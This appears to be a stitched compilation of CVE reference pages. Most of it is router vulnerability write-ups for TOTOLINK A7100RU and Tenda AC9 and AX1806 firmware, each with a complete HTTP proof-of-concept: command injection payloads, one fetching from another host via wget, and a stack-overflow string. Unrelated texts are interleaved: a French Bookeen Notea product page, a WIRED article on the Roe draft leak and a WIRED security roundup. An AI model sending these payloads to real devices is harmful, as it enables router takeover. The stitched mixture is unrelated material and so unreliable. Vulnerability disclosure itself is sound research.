It is found that there is a command injection vulnerability in the setWiFiAdvancedCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the merge parameter to V2, and then brings V2 into UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiAdvancedCfg",
    "merge":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28581: IOT_vuln/TOTOLink/A7100RU/9 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiSignalCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28582: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiWpsCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28583: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiWpsStart interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by htbsscoexistence parameter to V15, and then brings V15 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsStart",
    "htBSSCoexistence":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28584: IOT_vuln/TOTOLink/A7100RU/8 at main · EPhaha/IOT_vuln

Bookeen Notea Firmware BK_R_1.0.5_20210608 is affected by a directory traversal vulnerability that allows an attacker to obtain sensitive information.

**Comme sur le papier**

La saisie au stylet WACOM rapide et sensible à la pression permet de dessiner avec une grande précision. Initialement **mise au point pour les tablettes graphiques professionnelles,** cette technologie ne nécessite ni fil, ni batterie et autorise une écriture souple et précise. L’affichage instantané sur la surface texturée de l’écran à encre électronique Eink offre une expérience d'écriture identique à celle que l'on a sur papier.

*   **Saisie au stylet**
    
    Technologie Wacom avec 4096 niveaux de pression.
    
*   **Effet papier**
    
    Ecran Eink (16 niveaux de gris) lisible en plein soleil avec une résolution 1404\*1872 de 227dpi
    
*   **Grand écran**
    
    Surface d'affichage de 10,3 pouces (26cm) de diagonale équivalent au format A5
    
*   **Eclairage pour usage de nuit**
    
    Luminosité programmable avec option de réglage de la lumière bleue.
    

**Une saisie ultra-précise pour professionnels**

Initialement mise au point pour les graphistes professionnels, la technologie Wacom autorise une saisie très précise sans interférence avec l'appui de la paume sur l'écran. La Notéa est ainsi compatible avec tous les stylets Wacom et peut gérer jusqu'à 4096 niveaux de pression.

**Un nouvel outil dans votre espace de travail**

La Notéa ajoute des fonctions numériques à votre bloc-notes. Le reconnaissance d'écriture, l'annotation de livres et documents, le partage par email ou sur grand écran.

*   **Transcription des notes**
    
    Conversion automatique des notes manuscrites en texte par MyScript© (33 langues)
    
*   **Annotation de documents**
    
    Prise de notes directement sur documents PDF et EPUB
    
*   **Partage par email**
    
    Envoi et réception directs des notes et documents depuis le bloc-notes numérique.
    
*   **Affichage sur grand écran**
    
    Partage d'écran et diffusion sur téléviseur via Miracast
    

**L'expertise de l'écriture numérique**

La Notéa intègre Myscript©, le plus puissant moteur de reconnaissance d'écriture manuscrite. Les notes qu'elles soient écrites en cursives, en majuscules ou en scriptes, sont converties en quelques secondes vers un fichier Txt ou PDF. Ne laissez plus votre contenu manuscrit à l'écart de votre quotidien dans le monde numérique.

**Autonome et mobile**

Avec son poids plume, prenez votre Notéa partout avec vous. Sa batterie de haute capacité (4000 mAh) vous offrira une autonomie d'une semaine sans recharge. La Notéa possède 32Go de stockage interne et peut également se synchroniser avec différents services de Cloud.

*   **1 semaine d'autonomie**
    
    Batterie Lithium Polymer 4000mAh
    
*   **Mémoire**
    
    32 Go de stockage interne et accès aux différentes services de stockage dans le cloud via les apps.
    
*   **Transfert et partage**
    
    Connexion sans-fil Wifi : IEEE 802.11 b/g/n et Bluetooth : BT 4.2 & BLE.
    
*   **USB-C**
    
    Connecteur USB pour recharge, casque audio, connexion PC
    

**Une tablette à part entière**

La Notéa® peut être considérée comme une tablette tactile Android à part entière proposant un accès à un store d'applications. La Notéa est équipée de deux haut-parleurs et d’un micro.

*   **Interface au doigt**
    
    Ecran tactile capacitif sans interférence avec le stylet
    
*   **Audio**
    
    Haut-parleurs ou écouteurs par USB-C ou Bluetooth pour les applications audio
    
*   **Enregistrement**
    
    Microphone intégré pour les apps nécessitant un enregistrement audio et/ou une prise de son
    
*   **Store d'applications**
    
    Compatible avec le système Android 8.. Accès au Playstore pour télécharger des Apps.
    

*   **Mine texturée**
    
    La mine du stylet spécialement conçue pour procurer un touché très proche de celui de l'écriture sur papier.
    
*   **Gomme**
    
    Bouton latéral qui permet au stylet de basculer en mode gomme et d'effacer par trait ou par zone.
    
*   **Ctrl-z**
    
    Rien n'est irréversible sur la Notéa, bouton latéral d'annulation et de reprise des derniers traits réalisés au stylet.
    
*   **Bluetooth**
    
    Appairage Bluetooth avec la Notéa permettant la personnalisation et l'utilisation de trois boutons latéraux. Fonction Bluetooth rechargeable par USB.
    

**Spécifications techniques**

**Dimensions**

Modèle : CYBN10F

Fonction : Bloc-Notes numérique

Dimensions : 191,1 x 232,5 x 8,0 mm

Poids : 460 g

**Logiciel**

Système d'exploitation : Android 8.1

Play Store : Installable

**Ecran**

Taille : 10,3'' (26cm)

Résolution (Pixels) : 1404\*1872

DPI : 227

Niveaux de gris : 16

Ecran capacitif : oui

Wacom (EMR) : Oui

Front Light (FL) : Oui

Filtre lumière bleue : Oui

**Electronique**

CPU : 1.8 GHz Quad-Core

RAM : 2 Go

Stockage : 32 Go

USB 2.0 : Type C

LED de charge : Blanc

Écouteurs : Type C

Micro : Oui

Haut-parleur : Stéréo

Wi-Fi : IEEE 802.11 b/g/n

Bluetooth : BT 4.2

Bluetooth BLE : Oui

Accéléromètre : Oui

Effet Hall : Oui (Couverture intelligente)

Power button : Power on/off

**Batterie et autonomie**

Type : Lithium-Ion Polymer

Capacité : 3,7 V/4000 mAh

Consommation en veille : 2,0 mA

Durée en veille : 60 jours

**Stylet**

Wacom (EMR) : Oui (4096 niveux de pression)

Bluetooth : 3 boutons : mise en veille, haut, bas

Micro-USB : Recharge batterie pour fonction Bluetooth

**Inscription à la Newsletter**

CVE-2021-45783: Bookeen, la lecture numérique

The leak of a draft opinion overturning Roe v. Wade quickly sparked a court investigation. Which laws may have been violated, if any, remains uncertain.

The leak of a seismic draft opinion from the US Supreme Court that would overturn _Roe v. Wade_ has somehow managed overnight to elicit roughly equal outpourings of anger from the right and left: The left has rallied to decry a decision that would overturn a 50-year-old cornerstone of reproductive rights. Conservatives, despite the historic victory the ruling would represent for their side, have meanwhile targeted their political outrage at a far more specific individual: the leaker.

Just hours after Politico published a draft of the majority ruling written by Justice Samuel Alito calling the _Roe_ decision "egregiously wrong from the start" and overruling that five-decade-old precedent, figures across the right issued a chorus of calls for the investigation and prosecution of the anonymous source of the "illegal" leak. CBS News went so far as to report—somewhat vaguely—that it expects an investigation “involving the FBI” into the leak's source. And Chief Justice John Roberts has opened an investigation into the disclosure.

But all of that furor is undermined by an inconvenient legal truth: Leaking a Supreme Court decision doesn't actually seem to be a crime—at least not by any clear and undisputed definition. "Right now, it's unclear whether the leaker broke any law at all," says Trevor Timm, a First Amendment–focused lawyer and the executive director of the Freedom of the Press Foundation. "Even the people claiming this act is beyond the pale and the FBI must investigate haven't pointed to a definitive law this leaker allegedly broke."

Timm cites a lengthy Twitter thread published late Monday by the well-known UC Berkeley legal scholar Orin Kerr, who responded to the leak Monday night by pointing out that a Supreme Court draft doesn't meet any of the obvious criteria that would make it an illegal document to hand to a journalist: Most important, it's not classified, so leaking it doesn't open the leaker to prosecution under the Espionage Act. "As far as I can tell, there is no federal criminal law that directly prohibits disclosure of a draft legal opinion," Kerr concluded.

Of course, if the source is someone who hacked into a computer of, say, a Supreme Court justice or law clerk—or swiped the paper off their desk—the leaker could be prosecuted with computer fraud and abuse or theft, Kerr points out. But otherwise, despite the historical rarity of Supreme Court leaks and the politically radioactive nature of this one, Kerr argues there's no slam-dunk argument to federally prosecute the leaker.

Instead, Kerr suggests that any federal prosecutor seeking to make a case against Politico's leaker might have to resort to a far shakier statute, known as 18 U.S.C. § 641. That broad statute forbids the theft or misuse of government-owned "things of value"—a broadly written law seemingly designed at a surface level to prevent embezzlement or graft by those with access to the government's property. But whether it applies to information—and what kind of information, given to whom—remains an open question in federal law, with different circuit courts fundamentally disagreeing in their rulings.

"Legal scholarship provides little clarity regarding § 641’s interpretation; only a few scholars have even recognized § 641’s application to information," reads a _Columbia Law Review_ article about the statute's use for prosecuting leakers, written by Jessica Lutkenhaus, an attorney focused on criminal defense at the law firm Wilmer Hale. "The circuits disagree about whether § 641 applies to information, and, if it does, what its scope is: What information constitutes a 'thing of value'?"

Sharing information is arguably fundamentally different from stealing "a thing of value," Freedom of the Press Foundation's Timm points out. "You can't steal a government Jeep or take something tangible or physical from government offices," Timm says. "But copying something can be construed as different from stealing something. You copy it, and the original thing is still there, and you just leave with papers that didn't exist before."

That ambiguity has led different federal courts to come to contradictory conclusions. A Fourth Circuit court, for instance, found in 1991 that a Department of Defense employee who left the DOD for a job at a defense contractor and took information with him was guilty of violating § 641. But a Ninth Circuit court has come to an opposite conclusion, finding in a 1959 case that "intangible" goods are not covered by § 641. That ruling was later applied in 1988 by the same circuit to the case of an information leaker, a naval officer accused of stealing computer punch cards related to secret encryption information. The court confirmed that the information itself was not covered by § 641—though his appeal was thrown out anyway because he'd stolen the physical punch cards that stored it.

Other circuit courts have come to conclusions somewhere in between, with some finding, for instance, that the § 641 _does_ apply to information leaks but noting that this doesn't extend to those covered by the First Amendment's protections on free speech and freedom of the press—findings with direct relevance to Politico's Supreme Court leaker.

Several of the most notable leakers in history have been charged under 18 U.S.C. § 641, too, including Daniel Ellsberg, Chelsea Manning, and Edward Snowden. But the use of that law was overshadowed by their prosecution under the Espionage Act, since all three were accused of leaking classified secrets, and none set a clear precedent. Ellsberg's charges were dropped due to improper government conduct by the Nixon administration, and Snowden has yet to face trial. Manning was convicted on the 18 U.S.C. § 641 count she faced, but in a military court, not a civilian one.

All of that leaves the legal status of Politico's leaker—if they are identified—far from certain. But any confident argument that they committed a crime is on equally shaky terrain, argues Timm. And that's especially true in a case where the leaker appears to have leaked a document directly to the press, with a clear interest in making the information public.

"Even if prosecutors think 18 U.S.C. § 641 applies, I'd have serious First Amendment concerns with broadly applying it to anyone who leaks a government document to the press," Timm says. "Leaks to the press are as American as apple pie. And, in many cases throughout history, have furthered democracy rather than hindered it."

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Is Leaking a SCOTUS Opinion a Crime? The Law Is Far From Clear

There is a stack overflow vulnerability in the goform/fast_setting_wifi_set function in the httpd service of Tenda ac9 15.03.2.21_cn router. An attacker can obtain a stable shell through a carefully constructed payload

**Tenda AC9 router has a stack overflow vulnerability****Firmware address**

Tenda official website：https://www.tenda.com.cn/default.html

About Tenda：https://www.tenda.com.cn/profile/contact.html

Firmware Download：https://www.tenda.com.cn/download/

**Impact version**

The latest version is shown in the figure

**Vulnerability details**

The program passes the content obtained by SSID parameter to SRC, and then copies SRC into S's stack through strcpy function. There is no size check, so there is a stack overflow vulnerability.

**Vulnerability recurrence and POC**

To reproduce the vulnerability, follow these steps：

​ 1.Use fat to simulate firmware V15 03.2.21\_ cn

​ 2.Attack with the following POC attacks

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.11.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1131
    Origin: http://192.168.11.1
    Connection: close
    Referer: http://192.168.11.1/parental_control.html?random=0.16095210121969683&
    Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcetv1qw
    
    ssid=9c%3Afc%3Ae8%3A1a%3A33%3A80aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

The picture shows the effect of POC attack

Finally, you can write exp, which can achieve a very stable effect of getting the root shell

CVE-2022-28560: -Router-vulnerability/Tenda AC9 at main · iot-firmeware/-Router-vulnerability

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Plus: Trump backers breach election systems, Microsoft tracks Russia's war prep, a new Facebook leak reveals a mess, and Bored Ape Yacht Club gets hacked.

Surprising news abounded this week as Ukrainian officials weigh next steps in their digital campaigns against Russia, given that their efforts so far have been unexpectedly successful, if sometimes controversial. Overall, Russia is being pummeled with cyberattacks of all sorts at a scale beyond anything the country has dealt with before.

Meanwhile, new research indicates that a small group of North Koreans have taught themselves to jailbreak smartphones in an effort to bypass the regime's extensive digital restrictions and access forbidden media.

Elon Musk's bid this week to purchase Twitter highlighted a host of potential privacy and security concerns for the platform's users. The United States faced a notable spike in child sexual abuse sites in 2021 as CSAM hosting continued to increase dramatically around the world. Hollywood's fight against VPNs has gotten more heated as the entertainment industry expands its accusations about illegal activity enabled by the services. And Cloudflare recorded a historic DDoS attack that bombarded a cryptocurrency platform with 15.3 million requests.

If you feel like doing something for your own security or that of your business this weekend, we've got a roundup of all the most critical mainstream vulnerabilities from April that you can patch right now. 

And there's more. We’ve rounded up all the news that we didn’t break or cover in depth this week. Click on the headlines to read the full stories. And stay safe out there.

The Office of the Director of National Intelligence released its annual transparency report on Friday, which showed that the FBI conducted as many as 3.4 million warrantless searches of Americans’ data in 2021, including 1.9 million searches related to a Russian cyberattack. This is the first time ODNI has published a number for FBI searches utilizing the Foreign Intelligence Surveillance Act of 1978, or FISA. The law is meant to authorize investigative capabilities related to foreign threats, but it allows for some incidental domestic searches in the process. FISA activity has often been criticized for happening without public transparency.

In an in-depth analysis, Reuters looks at eight incidents around the country in which activists supportive of former President Donald Trump have attempted to breach or successfully compromised local voting systems as part of their quest to uncover evidence of manipulation in the 2020 US presidential election. In most cases, activists persuaded local election officials, all Republicans, to export and leak vote data. In the year and a half since Joe Biden became president, Trump loyalists have continued to falsely assert that voting machines across the US were compromised to produce Biden's win.

“These threats are being fueled by extreme elected officials and political insiders who are spreading the Big Lie”—that the 2020 vote was stolen—“to further suppress the vote, destabilize American elections, and undermine voter confidence,” Colorado Secretary of State Jena Griswold told Reuters in a statement.

In a report on Wednesday, Microsoft said it has found evidence that Russia began setting the stage for its invasion of Ukraine as early as March or April 2021. During that time, Russian state-backed hackers began establishing access points in Ukrainian government and critical infrastructure systems, researchers found. The attackers seem to have been collecting intelligence on the Ukrainian military, NATO member states, and diplomatic targets. In the report, Microsoft calls Russian aggression against Ukraine a “hybrid war” and says that Russian cyberattacks have been “relentless and destructive.” 

Microsoft reports that in early 2021, as Russian troops began to gather at the Ukrainian border, the Russian hacking group known as APT 29, Cozy Bear, and Nobelium began mounting phishing attacks to establish access. Microsoft says the Russian hacking group known as Ghostwriter was also active at this time, targeting Ukrainian military email accounts and networks with phishing attacks.

An internal Facebook document prepared last year and obtained by Motherboard lays out concerns from privacy engineers on the social network's Ad and Business Product team about the company's ability to account for the data it holds and track data as it moves through the service. The revelations are not necessarily surprising, given Facebook's sheer scale and recurrent data control issues, but they are significant as the tech giant works to comply with an increasing array of privacy legislations around the world. 

“We do not have an adequate level of control and explainability over how our systems use data, and thus we can’t confidently make controlled policy changes or external commitments such as ‘we will not use X data for Y purpose.’ And yet, this is exactly what regulators expect us to do, increasing our risk of mistakes and misrepresentation,” the document says.

A company spokesperson told Motherboard that the document “does not describe our extensive processes and controls to comply with privacy regulations” and that “this document reflects the technical solutions we are building to scale the current measures we have in place to manage data and meet our obligations.”

Hackers compromised the Instagram account of NFT collection Bored Ape Yacht Club on Monday, posting a link to a copycat site that scammed visitors out of NFTs. The company said in a statement to WIRED that “Rough estimated losses due to the scam are 4 Bored Apes, 6 Mutant Apes, and 3 BAKC, as well as assorted other NFTs estimated at a total value of ~$3m.” NFT scams and other cryptocurrency hustles in which attackers publish a malicious or misleading link to steal coins are unfortunately not new. The BAYC situation is particularly ominous, though, because the company says it had full two-factor authentication enabled on the Instagram account and that “the security practices surrounding the IG account were tight.” The group is investigating how the Instagram takeover occurred.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Tag

#wifi